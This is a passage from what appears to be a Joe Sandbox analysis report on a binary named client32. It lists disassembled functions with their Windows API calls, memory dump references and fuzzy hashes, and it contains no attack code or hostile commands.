                                                                                • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                              • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                              • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                              • _free.LIBCMT ref: 1100B3C8
                                                                              • _free.LIBCMT ref: 1100B3CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                              • String ID:
                                                                              • API String ID: 705253285-0
                                                                              • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                              • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                              • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                              • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                              Function 11079270 Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110792EF
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                              • String ID: ..\ctl32\Coolbar.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$iTab >= 0 && iTab < idata->pButtonInfo->m_iCount$idata->pButtonInfo$m_hWnd
                                                                              • API String ID: 2776021309-3012761530
                                                                              • Opcode ID: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                              • Instruction ID: 43535e2045e6edea7900c1da28a671eb4229fa08b0c2923c5f5b9d209a058891
                                                                              • Opcode Fuzzy Hash: 9fc34f119076dcabc78fd5bd3c8792c7e4337f53f973009b984a304d2b57edc4
                                                                              • Instruction Fuzzy Hash: 7101D675F04355BBE710EE86ECC2FD6FBA4AB50368F00402AF95526581E7B1B440C6A5
                                                                              Function 1101D660 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 1101D66E
                                                                              • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                              • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                              • GetLastError.KERNEL32 ref: 1101D6F7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Load$ClassCursorErrorIconLastRegister_memset
                                                                              • String ID: 0
                                                                              • API String ID: 430917334-4108050209
                                                                              • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                              • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                              • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                              • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                              Function 11003390 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EFD), ref: 1100339D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110033C3
                                                                              • DestroyMenu.USER32(00000000), ref: 110033F2
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              • Opcode ID: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                              • Instruction ID: f0241db128611486ad2bba77008837faff31f6141376dc95c8c97f83293769ff
                                                                              • Opcode Fuzzy Hash: aec038cc46e432c7ccbbb9c417c57b99462259266c92d4bd57c73e054505ab39
                                                                              • Instruction Fuzzy Hash: 09F0EC3EE9063573D25211772C4AF8FB6844B8569DF540032FD26BA740EE14A40147B9
                                                                              Function 11003480 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EF1), ref: 1100348D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 110034B3
                                                                              • DestroyMenu.USER32(00000000), ref: 110034E2
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              • Opcode ID: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                              • Instruction ID: f340f484bb22d03bd5e0d621a808cbfa0eacb2cd0322e49d7d14e933c66e57f7
                                                                              • Opcode Fuzzy Hash: f23017a3e8d75a99b1dfbadc45444573fee26ed5fcaaf5f6ebfc035b38fd2773
                                                                              • Instruction Fuzzy Hash: 63F0EC3EF9063573D25321772C0AF8FB5844B8569DF550032FD26BEA40EE14B40146B9
                                                                              Function 11027580 Relevance: 9.1, APIs: 6, Instructions: 70threadwindowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageA.USER32(00000000,00000501,1102DB60,00000000), ref: 110275D2
                                                                              • Sleep.KERNEL32(00000032,?,1102DB60,00000001), ref: 110275D6
                                                                              • PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 110275F7
                                                                              • WaitForSingleObject.KERNEL32(00000000,00000032,?,1102DB60,00000001), ref: 11027602
                                                                              • CloseHandle.KERNEL32(00000000,00002710,?,1102DB60,00000001), ref: 11027614
                                                                              • FreeLibrary.KERNEL32(00000000,00000000,00000000,00002710,?,1102DB60,00000001), ref: 11027641
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread$CloseFreeHandleLibraryObjectSingleSleepWait
                                                                              • String ID:
                                                                              • API String ID: 2375713580-0
                                                                              • Opcode ID: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                              • Instruction ID: 5d0aa2bc238e72ac38ea6d9656cf733a88b5b02fa80378034871cbc9b64e3e84
                                                                              • Opcode Fuzzy Hash: 1167bbe8f404b4b170c5f303e961cdd6648e4dbde7aa15af3b93772e36ea41a8
                                                                              • Instruction Fuzzy Hash: B1217C71A43735DBE612CBD8CCC4A76FBA8AB58B18B40013AF524C7288C770A441CF91
                                                                              Function 1113D790 Relevance: 9.0, APIs: 6, Instructions: 49synchronizationthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11040BBA,00000000), ref: 1113D7C5
                                                                              • CreateThread.KERNEL32(00000000,00000000,1113D660,00000000,00000000,00000000), ref: 1113D7E0
                                                                              • SetEvent.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D805
                                                                              • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,11040BBA,00000000), ref: 1113D816
                                                                              • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D829
                                                                              • CloseHandle.KERNEL32(00000000,?,?,11040BBA,00000000), ref: 1113D83C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCreateEventHandle$ObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 414154005-0
                                                                              • Opcode ID: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                              • Instruction ID: 02350ad9304c652d5973a468123ac0969e3fb67a745117c4f7e49a1723ee0a3b
                                                                              • Opcode Fuzzy Hash: 254c25c95f36225789ab582df44d250993c27ed63b68ed0c4c323ac941b1d095
                                                                              • Instruction Fuzzy Hash: 9F11CE705C8265AAF7298BE5C9A8B95FFA4934631DF50402AF2389658CCBB02088CB54
                                                                              Function 111715A2 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 111715AE
                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                              • __amsg_exit.LIBCMT ref: 111715CE
                                                                              • __lock.LIBCMT ref: 111715DE
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 111715FB
                                                                              • _free.LIBCMT ref: 1117160E
                                                                              • InterlockedIncrement.KERNEL32(02CD16E8), ref: 11171626
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                              • String ID:
                                                                              • API String ID: 3470314060-0
                                                                              • Opcode ID: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                              • Instruction ID: 224c65a35f2b569fe2d6e63dca2a733826a481c10535b45dbfb9364d9a312d7f
                                                                              • Opcode Fuzzy Hash: dad0e97e86b6fe847014ebdb1c65e5de67e018ea6a8123b1860c0bf04b02162f
                                                                              • Instruction Fuzzy Hash: 3001C4369027229BEB029FA9858479DF761AB0271CF490015E820A7B84CB70A992DFD6
                                                                              Function 110B3560 Relevance: 9.0, APIs: 6, Instructions: 42synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetEvent.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3578
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B3585
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B3598
                                                                              • CloseHandle.KERNEL32(?,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35A5
                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,111F10F8,111E6C98,?,110B7A1E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B35C3
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7A64), ref: 110B35D0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$EventObjectSingleWait
                                                                              • String ID:
                                                                              • API String ID: 2857295742-0
                                                                              • Opcode ID: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                              • Instruction ID: c91d849fc108652eb31eb37091e5d5d4b5a552e1f27565d093635cb0be7e85a1
                                                                              • Opcode Fuzzy Hash: 47e8cf337b2ce15499ba854ff78383ed598d3397d94da8483aa60cf9ecc16ddf
                                                                              • Instruction Fuzzy Hash: 96011A75A087049BD7909FB988D4A96F7DCEB54300F11492EE5AEC3200CB78B8448F60
                                                                              Function 11095990 Relevance: 9.0, APIs: 6, Instructions: 38COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                              • GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                              • GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                              • GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                              • GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-0
                                                                              • Opcode ID: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
                                                                              • Instruction ID: b65ab4a361e5326c91c4d36ade1d631f08c7cf5d252a1eb012e320adc1ee70d1
                                                                              • Opcode Fuzzy Hash: 2acc5d47520048a17b19bc27345c05a5b6d72aca177766317273f5998d5a9f83
